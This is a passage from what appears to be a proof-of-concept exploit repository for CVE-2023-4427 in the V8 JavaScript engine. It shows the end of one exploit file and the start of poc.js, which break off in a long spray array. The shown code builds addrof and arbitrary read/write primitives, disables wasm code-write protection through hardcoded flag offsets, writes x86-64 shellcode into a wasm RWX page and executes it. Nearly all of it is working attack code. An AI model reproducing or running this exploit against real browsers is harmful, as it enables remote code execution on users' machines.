1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309, 1.86926619662186e-310, 8.344026986301506e-309]; 117 | 118 | var addrof_array = new Array(32); 119 | corrupted_array = re.lastIndex; 120 | 121 | // Adapt this with your own value to create a fake array object 122 | // print(helper.pair_i32_to_f64(0x00203b19, 0x2269)); 123 | // print(helper.pair_i32_to_f64(0x0343151, 0x60000)); 124 | var parent_array_addr = helper.ftoil(corrupted_array[0]); 125 | // print(helper.hex(parent_array_addr)); 126 | 127 | function addrof(obj) { 128 | addrof_array[0] = obj; 129 | return corrupted_array[5]; 130 | } 131 | 132 | function arbRead(where) { 133 | fake_object_array[131] = helper.pair_i32_to_f64(where - 8, 0x20); 134 | return corrupted_array[0]; 135 | } 136 | 137 | function arbWrite(where, what) { 138 | fake_object_array[131] = helper.pair_i32_to_f64(where - 8, 0x20); 139 | corrupted_array[0] = helper.i64tof64(what); 140 | } 141 | 142 | let mem = new ArrayBuffer(1024); 143 | let dv = new DataView(mem); 144 | 145 | let mem_addr = helper.ftoil(addrof(mem)); 146 | print("[+] mem addr:", helper.hex(mem_addr)) 147 | 148 | 149 | // remove wasm write protection, use your own offset 150 | let TARGET = { 151 | 'base': 0x7ff6, 152 | 'FLAG_write_protect_code_memory': 0xcde20b10, 153 | 'FLAG_wasm_memory_protection_keys': 0xcde20aa5, 154 | 'FLAG_wasm_write_protect_code_memory': 0xcde20aa4 155 | } 156 | arbWrite(mem_addr + 0x1c, helper.f64toi64(helper.pair_i32_to_f64(TARGET['FLAG_write_protect_code_memory'], TARGET['base']))); 157 | dv.setUint8(0, 0, true); 158 | arbWrite(mem_addr + 0x1c, helper.f64toi64(helper.pair_i32_to_f64(TARGET['FLAG_wasm_memory_protection_keys'], TARGET['base']))); 159 | dv.setUint8(0, 0, true); 160 | arbWrite(mem_addr + 0x1c, helper.f64toi64(helper.pair_i32_to_f64(TARGET['FLAG_wasm_write_protect_code_memory'], TARGET['base']))); 161 | dv.setUint8(0, 0, true); 162 | 163 | var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]); 164 | var wasmModule = new WebAssembly.Module(wasmCode); 165 | var wasmInstance = new WebAssembly.Instance(wasmModule, {}); 166 | var f = wasmInstance.exports.main; 167 | 168 | fake_object_array[131] = helper.pair_i32_to_f64(0x0343151, 0x60000); 169 | let wasmInstance_addr = helper.ftoil(addrof(wasmInstance)); 170 | print("[+] mem addr:", helper.hex(wasmInstance_addr)); 171 | 172 | let rwx_page = helper.f64toi64(arbRead(wasmInstance_addr + 0x60)); 173 | print("[+] rwx_page addr:", helper.hex(rwx_page)); 174 | 175 | arbWrite(mem_addr + 0x1c, rwx_page); 176 | 177 | let shellcode = [72, 49, 255, 72, 247, 231, 101, 72, 139, 88, 96, 72, 139, 91, 24, 72, 139, 91, 32, 72, 139, 27, 72, 139, 27, 72, 139, 91, 32, 73, 137, 216, 139, 91, 60, 76, 1, 195, 72, 49, 201, 102, 129, 193, 255, 136, 72, 193, 233, 8, 139, 20, 11, 76, 1, 194, 77, 49, 210, 68, 139, 82, 28, 77, 1, 194, 77, 49, 219, 68, 139, 90, 32, 77, 1, 195, 77, 49, 228, 68, 139, 98, 36, 77, 1, 196, 235, 50, 91, 89, 72, 49, 192, 72, 137, 226, 81, 72, 139, 12, 36, 72, 49, 255, 65, 139, 60, 131, 76, 1, 199, 72, 137, 214, 243, 166, 116, 5, 72, 255, 192, 235, 230, 89, 102, 65, 139, 4, 68, 65, 139, 4, 130, 76, 1, 192, 83, 195, 72, 49, 201, 128, 193, 7, 72, 184, 15, 168, 150, 145, 186, 135, 154, 156, 72, 247, 208, 72, 193, 232, 8, 80, 81, 232, 176, 255, 255, 255, 73, 137, 198, 72, 49, 201, 72, 247, 225, 80, 72, 184, 156, 158, 147, 156, 209, 154, 135, 154, 72, 247, 208, 80, 72, 137, 225, 72, 255, 194, 72, 131, 236, 32, 65, 255, 214, 195]; 178 | 179 | for (var i = 0; i < shellcode.length; i++) { 180 | dv.setUint8(i, shellcode[i], true); 181 | } 182 | 183 | corrupted_array = null; 184 | re.lastIndex = {}; 185 | 186 | f(); -------------------------------------------------------------------------------- /CVE-2023-4427/poc.js: -------------------------------------------------------------------------------- 1 | /* eslint-disable guard-for-in */ 2 | /* eslint-disable require-jsdoc */ 3 | class Helpers { 4 | constructor() { 5 | this.buf = new ArrayBuffer(8); 6 | this.dv = new DataView(this.buf); 7 | this.u8 = new Uint8Array(this.buf); 8 | this.u32 = new Uint32Array(this.buf); 9 | this.u64 = new BigUint64Array(this.buf); 10 | this.f32 = new Float32Array(this.buf); 11 | this.f64 = new Float64Array(this.buf); 12 | 13 | this.roots = new Array(0x30000); 14 | this.index = 0; 15 | } 16 | 17 | pair_i32_to_f64(p1, p2) { 18 | this.u32[0] = p1; 19 | this.u32[1] = p2; 20 | return this.f64[0]; 21 | } 22 | 23 | i64tof64(i) { 24 | this.u64[0] = i; 25 | return this.f64[0]; 26 | } 27 | 28 | f64toi64(f) { 29 | this.f64[0] = f; 30 | return this.u64[0]; 31 | } 32 | 33 | set_i64(i) { 34 | this.u64[0] = i; 35 | } 36 | 37 | set_l(i) { 38 | this.u32[0] = i; 39 | } 40 | 41 | set_h(i) { 42 | this.u32[1] = i; 43 | } 44 | 45 | get_i64() { 46 | return this.u64[0]; 47 | } 48 | 49 | get_f64() { 50 | return this.f64[0]; 51 | } 52 | 53 | ftoil(f) { 54 | this.f64[0] = f; 55 | return this.u32[0]; 56 | } 57 | 58 | ftoih(f) { 59 | this.f64[0] = f; 60 | return this.u32[1]; 61 | } 62 | 63 | add_ref(object) { 64 | this.roots[this.index++] = object; 65 | } 66 | 67 | mark_sweep_gc() { 68 | new ArrayBuffer(0x7fe00000); 69 | } 70 | 71 | scavenge_gc() { 72 | for (let i = 0; i < 8; i++) { 73 | // fill up new space external backing store bytes 74 | this.add_ref(new ArrayBuffer(0x200000)); 75 | } 76 | this.add_ref(new ArrayBuffer(8)); 77 | } 78 | 79 | hex(i) { 80 | return i.toString(16).padStart(16, "0"); 81 | } 82 | 83 | breakpoint() { 84 | this.buf.slice(); 85 | } 86 | } 87 | function sleep(ms) { 88 | return new Promise((resolve) => setTimeout(resolve, ms)); 89 | } 90 | function hang() { 91 | while (1) {} 92 | } 93 | 94 | function pwn() { 95 | const helper = new Helpers(); 96 | 97 | // =================== // 98 | // Start here! // 99 | // =================== // 100 | helper.scavenge_gc(); 101 | 102 | helper.mark_sweep_gc(); 103 | helper.mark_sweep_gc(); 104 | // 00042129 105 | 106 | driver_array = [ 107 | 3.69439535138165225921828113275e-311, 1.11253692977586019346629363689e-308, 108 | 3.3, 4.4, 109 | ]; 110 | const float_array = [1.1, 2.2, 3.3, 4.4]; 111 | const obj_array = [{}, {}, {}, {}]; 112 | 113 | const object1 = {}; 114 | object1.a = 1; 115 | const object2 = {}; 116 | object2.a = 1; 117 | object2.b = 1; 118 | const object3 = {}; 119 | object3.a = 1; 120 | object3.b = 1; 121 | object3.c = 1; 122 | for (const key in object2) { 123 | } 124 | 125 | // %DebugPrint(driver_array); 126 | // %SystemBreak(); 127 | fake_object_array = [ 128 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 129 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 130 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 131 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 132 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 133 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 134 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 135 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 136 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 137 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 138 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 139 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 140 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 141 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 142 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 143 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 144 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 145 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 146 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 147 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 148 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 149 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 150 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 151 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 152 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 153 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 154 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 155 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 156 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 157 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 158 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 159 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 160 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 161 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 162 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 163 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 164 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 165 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 166 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 167 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 168 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 169 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 170 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 171 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 172 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 173 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 174 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 175 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 176 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 177 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 178 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 179 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 180 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 181 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 182 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 183 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 184 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 185 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 186 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 187 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 188 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 189 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 190 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 191 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 192 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 193 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 194 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 195 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 196 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 197 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 198 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 199 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 200 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 201 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 202 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 203 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 204 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 205 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 206 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 207 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 208 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 209 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 210 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 211 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 212 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 213 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 214 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 215 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 216 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 217 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 218 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 219 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 220 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 221 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 222 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 223 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 224 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 225 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 226 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 227 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 228 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 229 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 230 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 231 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 232 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 233 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 234 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 235 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 236 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 237 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 238 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 239 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 240 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 241 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 242 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 243 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 244 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 245 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 246 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 247 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 248 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 249 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 250 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 251 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 252 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 253 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 254 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 255 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 256 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 257 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 258 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 259 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 260 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 261 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 262 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 263 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 264 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 265 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 266 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 267 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 268 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 269 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 270 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 271 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 272 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 273 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 274 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 275 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 276 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 277 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 278 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 279 | 2.2431044572652967563980781402e-308, 2.2431044572652967563980781402e-308, 280 